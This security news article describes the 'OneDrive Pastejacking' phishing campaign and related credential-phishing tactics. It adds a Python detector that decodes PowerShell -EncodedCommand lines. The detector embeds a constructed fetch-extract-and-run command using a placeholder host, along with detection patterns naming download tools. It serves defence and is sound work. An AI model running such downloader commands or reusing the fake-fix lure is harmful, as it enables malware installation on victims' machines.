OneDrive Phishing Scam
Cybersecurity experts have warned about a new phishing campaign targeting Microsoft OneDrive users. This campaign aims to deploy a harmful PowerShell script by employing sophisticated social engineering techniques to trick users into running the script and compromising their systems. The researchers are monitoring this innovative phishing and downloader campaign, which they have dubbed OneDrive Pastejacking.
The Attackers Imitate OneDrive to Trick Victims
The attack starts with an email containing an HTML file that, when opened, presents an image mimicking a OneDrive page and displays an error message stating: "Failed to connect to the 'OneDrive' cloud service. To resolve this issue, manually update the DNS cache."
The email provides two options: 'How to fix' and 'Details.' The 'Details' link directs users to a genuine Microsoft Learn page on DNS troubleshooting.
However, clicking 'How to fix' walks the user through a series of steps: press 'Windows Key + X' to open the Quick Link menu, open a PowerShell terminal, and paste a Base64-encoded PowerShell command that supposedly fixes the issue. The user is the one who runs the malware; no exploit is involved.
Once decoded, the command first executes ipconfig /flushdns (so the 'fix' appears to do what the error message promised), then creates a folder named 'downloads' on the C: drive. It proceeds by downloading an archive file into this folder, renaming it, extracting its contents (which include 'script.a3x' and 'AutoIt3.exe'), and running 'script.a3x' with 'AutoIt3.exe'.
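A detection check for the chain described above, written as an added example for this article; it is not code from the page or from the researchers who reported the campaign, and the encoded command it inspects is constructed here to mirror the described behaviour (DNS flush, folder creation, download, rename, extract, AutoIt3 launch), not the campaign's real command. It assumes you have process-creation command lines (Sysmon Event ID 1 or Security 4688 style) and shows the detail that trips up naive decoders: PowerShell's -EncodedCommand carries Base64 of the UTF-16LE script, not UTF-8, and PowerShell accepts any unambiguous prefix of the parameter name (-e, -ec, -enc, ...).

```python
import base64
import binascii
import re

# PowerShell expects -EncodedCommand to be Base64 over the UTF-16LE bytes of the script.
def encode_powershell(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed stand-in for the pastejacking payload; mirrors the steps the article
# describes, with a placeholder URL. Not the real campaign command.
CONSTRUCTED_CHAIN = (
    "ipconfig /flushdns; "
    "mkdir C:\\downloads; "
    "Invoke-WebRequest -Uri https://example.invalid/pkg.zip -OutFile C:\\downloads\\x.pdf; "
    "Rename-Item C:\\downloads\\x.pdf C:\\downloads\\x.zip; "
    "Expand-Archive C:\\downloads\\x.zip C:\\downloads; "
    "C:\\downloads\\AutoIt3.exe C:\\downloads\\script.a3x"
)

# Constructed sample command lines (what a 4688 / Sysmon 1 record would carry).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_powershell(CONSTRUCTED_CHAIN),
    "powershell.exe -enc " + encode_powershell("Get-Date; Write-Output 'routine'"),  # encoded but benign
    'powershell.exe -Command "ipconfig /flushdns"',  # a real DNS flush, no downloader stage
    "cmd.exe /c dir",
]

# PowerShell resolves -EncodedCommand from any prefix ("-e" is special-cased to it),
# and also accepts "-ec"; "/" works as a parameter prefix too.
_ENC_PREFIXES = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
ENC_FLAG = re.compile(
    r"(?<![\w-])[-/](?:" + "|".join(sorted(_ENC_PREFIXES, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]{16,})",
    re.I,
)

# Stages of the chain the article describes. Ordered so hits come back in chain order.
INDICATORS = {
    "dns_flush": re.compile(r"ipconfig\s+/flushdns", re.I),
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|\bwget\b|start-bitstransfer", re.I),
    "rename": re.compile(r"rename-item|\bren\b|move-item", re.I),
    "extract": re.compile(r"expand-archive|\btar\s+-x|zipfile", re.I),
    "autoit": re.compile(r"autoit3(?:\.exe)?\b|\.a3x\b", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the plaintext script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1))
        return raw.decode("utf-16-le")  # NOT utf-8: every ASCII char is followed by a 0x00 byte
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(hits: set) -> str:
    # AutoIt3 running an .a3x from a script is the strongest signal; otherwise require the
    # full flush -> download -> extract sequence so a lone 'ipconfig /flushdns' stays clean.
    if "autoit" in hits or {"dns_flush", "download", "extract"} <= hits:
        return "pastejacking_chain"
    if {"download", "extract"} <= hits:
        return "downloader_stage"
    return "clean"


def analyze(cmdline: str) -> dict:
    """Decode (if needed) and score one process-creation command line."""
    script = decode_encoded_command(cmdline)
    encoded = script is not None
    text = script if encoded else cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"encoded": encoded, "script": text, "indicators": hits, "verdict": classify(set(hits))}


def scan(cmdlines):
    """Return (index, verdict, indicators) for every line that is not clean."""
    out = []
    for i, line in enumerate(cmdlines):
        r = analyze(line)
        if r["verdict"] != "clean":
            out.append((i, r["verdict"], r["indicators"]))
    return out


if __name__ == "__main__":
    for i, verdict, hits in scan(SAMPLE_COMMAND_LINES):
        print(f"line {i}: {verdict} {hits}")
```

Only the first constructed line should be flagged: the benign encoded command and the genuine DNS flush stay clean, which is the point of requiring the whole chain rather than alerting on ipconfig /flushdns or on -EncodedCommand alone. In production the same logic belongs on Script Block Logging (Event ID 4104), where the decoded text is already available and obfuscation layered on top of the Base64 still has to be unwrapped before the AutoIt3 launch.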
Phishing Tactics Are Adopting New Tricks
The OneDrive Pastejacking phishing campaign has been detected targeting users across the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
This discovery follows previous research on similar phishing tactics, known as ClickFix, which are becoming more common.
Additionally, a new email-based social engineering scheme has emerged, distributing fake Windows shortcut files that trigger malicious payloads hosted on Discord's Content Delivery Network (CDN).
The Attackers Exploit Legitimate Accounts
Phishing campaigns are increasingly using emails with links to Microsoft Office Forms from compromised legitimate accounts to trick targets into revealing their Microsoft 365 login credentials. The pretext often involves restoring Outlook messages.
Attackers design convincing forms on Microsoft Office Forms, embedding unsafe links within them. These forms are sent in bulk via email, masquerading as legitimate requests, such as password changes or accessing important documents, often imitating trusted platforms like Adobe or Microsoft SharePoint.
Additionally, other phishing attempts have employed invoice-themed bait to lure victims into entering their credentials on phishing pages hosted on Cloudflare R2, with the collected information being sent to the attackers via a Telegram bot.
It's clear that adversaries are continuously exploring new methods to bypass Secure Email Gateways (SEGs) to enhance the success rate of their attacks.